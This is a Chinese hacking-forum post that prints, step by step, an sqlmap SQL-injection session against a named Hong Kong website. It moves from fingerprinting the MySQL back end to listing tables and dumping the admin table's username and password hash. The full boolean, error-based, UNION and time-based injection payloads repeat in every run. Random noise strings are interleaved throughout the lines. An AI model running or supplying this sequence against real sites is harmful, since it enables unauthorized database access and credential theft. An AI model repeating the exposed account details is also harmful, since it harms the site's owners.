中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 Y3 r. l. p3 x6 E$ C# c( d
ms "Mysql" --current-user       /*  注解:获取当前用户名称2 m* F3 P! B' }2 Z' Y9 {: ^
    sqlmap/0.9 - automatic SQL injection and database takeover tool
: W4 f. z; j+ Z$ |    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ' G% y/ e& ]  }( o. F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    , Y" N( @) d9 }' D" I session file  w$ q. x; p" z
    [16:53:54] [INFO] resuming injection data from session file
    ( S2 h2 Z% q5 J[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 ?: M3 O* f( v) i; i
    [16:53:54] [INFO] testing connection to the target url
    ' l3 d) _, i* s% w% F8 _: P( |sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 S7 W6 ~3 A* V; A8 |# ?sts:
    " d- Y0 r' U% r5 S: e---+ J+ B% W" `0 V
    Place: GET- E; F3 w; h) ]3 d$ e. q/ F! \5 }
    Parameter: id
      d0 d* S# I$ K4 I8 o; m    Type: boolean-based blind
    # \  h" f' B+ X- R, o1 W! F    Title: AND boolean-based blind - WHERE or HAVING clause
    8 V- W+ r. x' Q# N+ y4 a& p    Payload: id=276 AND 799=799- E4 B; T. d+ R7 a1 e" V2 q( P: J
        Type: error-based  v* c* |# D0 c  E7 p  D
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    9 T) B7 n4 v8 @7 P$ [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 d# a; I( n! P6 D  J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 D2 q, V9 ~0 H9 V
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . `+ o5 Y& N0 Y1 s8 w, E    Type: UNION query9 I% U  C, h/ \* \% x
        Title: MySQL UNION query (NULL) - 1 to 10 columns% e4 d# `3 q& u1 R
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ' I& q6 p9 H7 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * I" e, @) Z4 d6 u4 X; [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; z: \# @/ Y- J/ M5 F- X- |
        Type: AND/OR time-based blind0 ]2 A/ o% C0 b
        Title: MySQL > 5.0.11 AND time-based blind
    ; `' n3 O, P) ]6 ]    Payload: id=276 AND SLEEP(5)
    ! S. I$ B1 O+ E: B6 d( o5 g: e" A, ]! K0 ^---# a2 \. M$ {5 Z9 a( l3 C, `
    [16:53:55] [INFO] the back-end DBMS is MySQL
      K0 u  \5 B' Y0 {' c3 ^web server operating system: Windows
    : E# @: M: A3 B1 e) I7 Lweb application technology: Apache 2.2.11, PHP 5.3.07 }8 C1 d; Y1 X+ O2 i) C2 d
    back-end DBMS: MySQL 5.0' c! @8 D% U# Y
    [16:53:55] [INFO] fetching current user' H5 ~. s* B9 a* l( \: F
    current user:    'root@localhost'   2 W7 N) w, }- {' {: T0 c. V
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou  n9 K) p) D( o% a, L
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58
    * O( o( p4 z) Y; K0 ?
    . Q1 C) l$ Z5 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 f( b+ h& H2 m' K& h
    ms "Mysql" --current-db                  /*当前数据库( V& w/ X- Y5 }
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ! ^4 F" K9 R) q* p" s    http://sqlmap.sourceforge.net
  • starting at: 16:54:165 q( a3 {7 n# w& z$ [
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% W7 M5 n; _3 w- O2 O: |
    session file
    $ O1 g- |: g3 T; s; H4 a% y2 F. S[16:54:16] [INFO] resuming injection data from session file
    2 p3 ~" p2 I( m8 [( C  x[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 j( h/ k5 L: Y' G: u$ o
    [16:54:16] [INFO] testing connection to the target url
    , M( D8 d7 |9 z9 Q2 i# r" F9 `sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 {8 p' G" Z; V$ ~/ R! ~
    sts:
    % z& M. O9 O4 `& O, q/ c! E---6 o9 Z) C8 v/ c9 b5 c% q- w
    Place: GET
    & M! [  f+ S6 o' i; b* }Parameter: id
    7 r( o) [9 C4 w) P( P! k/ z) g# i    Type: boolean-based blind
    " O# z5 o  t. x; t! l& m    Title: AND boolean-based blind - WHERE or HAVING clause4 f  l$ J+ C4 L/ }7 z
        Payload: id=276 AND 799=799* H6 c7 X. V8 d& [# c/ j/ _7 ?2 N
        Type: error-based" P: ]4 }* k) i/ d: a" ~
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' ^, o5 |/ R7 `! j
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - S, y8 M; I. r$ {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # y/ {. w2 a8 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- U  q- C+ S2 b3 y7 G/ A1 r! P) z& J" i
        Type: UNION query
    - W7 k9 H0 x; y' I    Title: MySQL UNION query (NULL) - 1 to 10 columns# z! [1 d! W0 n$ b) I5 R
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 y/ `/ ?2 a) I% k; w7 y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    0 h0 u4 _, v- g+ l+ f; jCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) P$ N% y3 k# ?7 y
        Type: AND/OR time-based blind
    5 Y* B; [% m. O! Y# h5 h    Title: MySQL > 5.0.11 AND time-based blind
    * N% N# @8 E3 B& y1 I! ]4 e    Payload: id=276 AND SLEEP(5)
    / v! A: D7 h3 v9 j5 ?: D---$ A* L& Y' M* _2 f) J
    [16:54:17] [INFO] the back-end DBMS is MySQL  P; n, F1 n  b. g! ~/ x& i
    web server operating system: Windows* E* n7 _* \0 i$ h3 ^! r
    web application technology: Apache 2.2.11, PHP 5.3.0
    ' i, ~- F$ t/ B; d! nback-end DBMS: MySQL 5.0
    7 f+ L* o" Y& P2 M[16:54:17] [INFO] fetching current database
    - r% C# ^2 C+ z# l' }$ q- A, P) F: A* Fcurrent database:    'wepost'
    3 Q; p1 @7 L8 F& X/ z7 G[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    9 C0 u* z9 _4 e2 {tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    # Y' k$ P# z5 L! PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* F% t/ }. L8 u3 x1 ?& N
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名) `0 p5 O7 ?) H3 m- ~* t
        sqlmap/0.9 - automatic SQL injection and database takeover tool9 A+ S  a  F2 E) D
        http://sqlmap.sourceforge.net
  • starting at: 16:55:258 I. {- m8 J3 y' m3 G& d
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : {; F0 X' L, y) L% t9 M& T session file- f2 b  Y% {# t* U  m  h/ ^3 f1 S
    [16:55:25] [INFO] resuming injection data from session file
    - }5 Q) T  p6 m[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; ~% Z. M; ~, A4 y1 \5 v
    [16:55:25] [INFO] testing connection to the target url+ m  t$ p! e  F; l5 {
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ; k8 F* [( D9 Q# Vsts:
    7 o0 e8 C: s. i* `7 U3 B- D8 }% P---9 ~' J; J  J; K* {% q/ I
    Place: GET6 A8 o+ I' |& G
    Parameter: id) Y! h' @$ b: v4 X  Q& O
        Type: boolean-based blind; f8 K+ d: w! f. z3 T. O( x* H
        Title: AND boolean-based blind - WHERE or HAVING clause
    % d6 \& u# q  w( G1 q    Payload: id=276 AND 799=799
    , j+ F4 j1 w2 t    Type: error-based$ P! S4 b1 c; d% {, L7 Y
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    3 L3 l, g+ B! y0 a    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . j* V. O' e$ |' j( ~% v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, ]# \# z0 n! d; [4 \6 M' O4 ~
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    % l8 g  j; c9 c( z, K    Type: UNION query4 \9 m& {! i, W: ~
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ! ?6 z) p9 Q( R- W: u    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    3 W) X0 M& w# `4 g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # a9 Y" i6 Y% D0 r0 _: SCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ' J' ?/ G6 F4 P0 K    Type: AND/OR time-based blind, k) p* V6 w3 Q; v- z$ |3 t: p1 r
        Title: MySQL > 5.0.11 AND time-based blind7 A7 x) r: N2 C$ c( D
        Payload: id=276 AND SLEEP(5)
    ( Z$ F, C' ]# A2 L* j0 r1 @; L---: K3 O$ b2 }! g, M
    [16:55:26] [INFO] the back-end DBMS is MySQL
    0 D2 c% a1 M# `! ?+ g2 f$ F1 nweb server operating system: Windows
    - C6 p" \# {, B% nweb application technology: Apache 2.2.11, PHP 5.3.0
    6 f: D/ t* _7 i3 ]& d) Gback-end DBMS: MySQL 5.0
    ; v. u, j* W3 G[16:55:26] [INFO] fetching tables for database 'wepost') c2 m' K5 _; }8 r2 J8 |7 J
    [16:55:27] [INFO] the SQL query used returns 6 entries# }# _5 Q0 q- N2 I$ g/ x; s
    Database: wepost  h3 J" }. T) v3 A* ~6 _
    [6 tables]
    ! N. {& m  L+ B+-------------+
    ! K' o5 z( Q" v: b| admin       |1 ]. x2 C% I# A5 H2 u( o9 Y
    | article     |
      i" C/ e. a' H4 O| contributor |
    - e  r6 ~! {1 Z# `| idea        |) f. {- d$ E) m2 _% P
    | image       |  E2 a0 e) H( Y6 P: R2 i( B5 R3 {( x
    | issue       |+ `. m; l6 A9 k$ T
    +-------------+
    , w% l0 c6 D7 @% q5 P! c7 i[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, E3 a) P/ A, e* {/ e
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33* |0 }* }+ W) ^/ u- S% v
      s, k" R& r; k* H) W7 \1 M9 L
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 R  @8 y1 c* I% e/ h: ?% X$ r3 ~
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名" l; ^8 S. J, ]2 R; T
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    & F5 ]9 n* x: ?- H    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    9 a" \1 l- T1 [# |- y* esqlmap identified the following injection points with a total of 0 HTTP(s) reque; \: K  p  S* U3 Y1 |4 s5 ]
    sts:
    + [" ]8 F( Z3 v( Q3 Y---, R7 d  H! Z- C+ X; N
    Place: GET
    . w- J7 [4 ~0 j% ]7 v6 s" i( zParameter: id3 x) E8 q: |' Q) R) Z
        Type: boolean-based blind6 j4 \4 B& d6 R/ j1 T% j5 D
        Title: AND boolean-based blind - WHERE or HAVING clause* M# R! S- H5 G; c* ]  K* v
        Payload: id=276 AND 799=799$ o& a% U" ~5 B
        Type: error-based- q, k& Q$ k, A# P9 ^, X$ Z  E% `+ W
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! p" z1 `9 R/ z* h2 d: T" h
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ c. Z* v9 @; {, T
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    6 _3 [0 |/ s# j. Z- E$ }- {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . @, {% h. I+ Q) |  k$ j6 r& W    Type: UNION query
    * E. ]# I; g1 E7 N) H! @6 e    Title: MySQL UNION query (NULL) - 1 to 10 columns
    6 ]$ S4 u& C" l, ~, n    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) e2 X# a5 B2 m: e+ E+ G! ?" y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 x: i0 j0 F( R+ P7 i) ?7 ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 G6 j7 W5 P# a0 `0 L8 {$ h, ^
        Type: AND/OR time-based blind
    . B3 Y0 s. \4 }8 M& i4 i; w    Title: MySQL > 5.0.11 AND time-based blind
    - _! i# @; |6 c3 O! \6 ?$ Z. D% z" `    Payload: id=276 AND SLEEP(5)5 {! U8 Q* Q3 n
    ---
    : d! ?( L9 z4 @web server operating system: Windows0 m" b9 J) i: u9 h3 R2 t
    web application technology: Apache 2.2.11, PHP 5.3.0
    ( D$ s2 W2 U7 G% o4 @$ D" ?8 ?back-end DBMS: MySQL 5.06 Y" j, b: \% Q' O$ P
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se! r+ v# L. k  j9 ?/ \: b
    ssion': wepost, wepost
    + O5 N; ]$ z# m1 E4 H! ~; K6 E- VDatabase: wepost7 r; O" `' ^" ^: B# X9 u
    Table: admin
    ( T( I9 U5 ]3 T  h, j[4 columns]( d2 \. Y2 S5 c7 {! _. w
    +----------+-------------+! w, ~6 M2 a$ q) t
    | Column   | Type        |3 `# E  W, ?3 I% g
    +----------+-------------+4 \. [" F, G0 X
    | id       | int(11)     |1 X* m9 E& l. s/ ^- T
    | password | varchar(32) |
    ; `! i' F  B2 Y3 R| type     | varchar(10) |* H2 ^$ E' ~9 S: e* M
    | userid   | varchar(20) |3 J1 p! g! f3 k6 C: H3 z
    +----------+-------------+2 O7 F, H) L3 a8 x1 u" e( d/ r
  • shutting down at: 16:56:19
    : X+ N  k4 A. ^$ U* o0 H! r# i7 ]* O7 w' I% \
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 r  G3 G! n! D
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容& R& Z2 R' k; ^/ V* j
        sqlmap/0.9 - automatic SQL injection and database takeover tool. I! N. l" l; n+ @/ |! b7 S9 z9 V
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    * h, I1 C# p+ g- vsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    $ U* p. y& P: k4 z) Ysts:+ M0 s, H) q: R4 {# Q# v
    ---
    / m7 U$ I* N! F9 z5 [9 [Place: GET
    ; c$ M! @9 l  v1 z# VParameter: id5 R/ l1 \/ N  d8 n3 s. S+ q
        Type: boolean-based blind
      [) n0 R: l+ V. R, S. i    Title: AND boolean-based blind - WHERE or HAVING clause1 H, `. ]3 F$ ]' |
        Payload: id=276 AND 799=799
    / \0 |2 C& j( N2 X    Type: error-based
    : _9 v! @2 r% A+ \  s2 @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 S6 Y& X5 d4 v  H  l7 j. t: ]- `9 d
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 O1 Q. p( a' E9 J; v
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ' D. a; _* }' a% P% x0 {# d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ w' a) u, G# c& ~9 E4 Z
        Type: UNION query
    & J3 U' d! K! K    Title: MySQL UNION query (NULL) - 1 to 10 columns
    ' O: C* ~& G% _- ^# t) J    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 w; W( n" P& z- f( }/ J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ f6 H6 Z) y+ @% t& P1 M
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 Z5 R# j2 @2 E9 e( K
        Type: AND/OR time-based blind
    - `& }/ }2 Q; N! w! |1 B" R    Title: MySQL > 5.0.11 AND time-based blind
    + a7 Y! E( E, w! w4 L    Payload: id=276 AND SLEEP(5)1 o/ ?7 t$ [8 V+ f, J
    ---- n6 ^3 [) }2 D; B6 @2 T" i
    web server operating system: Windows/ P, K5 Y0 c6 z
    web application technology: Apache 2.2.11, PHP 5.3.0
      T* }8 s& y/ O7 {back-end DBMS: MySQL 5.0, S# X7 N# |2 w" Y7 y
    recognized possible password hash values. do you want to use dictionary attack o9 g  v0 |9 W6 R8 G' J. S# V
    n retrieved table items? [Y/n/q] y
    " ]* t; Z+ D/ Zwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt], m* t8 H) }% b: \" Z( ?$ T$ `
    do you want to use common password suffixes? (slow!) [y/N] y
      X! `! Z* `  h. C3 pDatabase: wepost  h0 t0 z! E6 Q' ^$ y. R
    Table: admin4 t' }4 q3 \: B- o( [
    [1 entry]: c9 T# e3 k- p" V( @/ ^( @1 w' o5 N
    +----------------------------------+------------+
    : t0 }* l! K" W+ d2 c% A| password                         | userid     |! q; H$ x% S% g: V. k. t
    +----------------------------------+------------+' [- f* g! l' B) B
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    3 V* V1 }4 Z. U6 n8 o+----------------------------------+------------+6 O8 X8 F- r; e3 b* ?6 ]* L5 C2 @8 U
  • shutting down at: 16:58:14( e" G5 @$ i, ~! ]$ @' ]
    % I% x$ P+ p3 ?! G7 ]$ g9 d7 K' V
    D:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2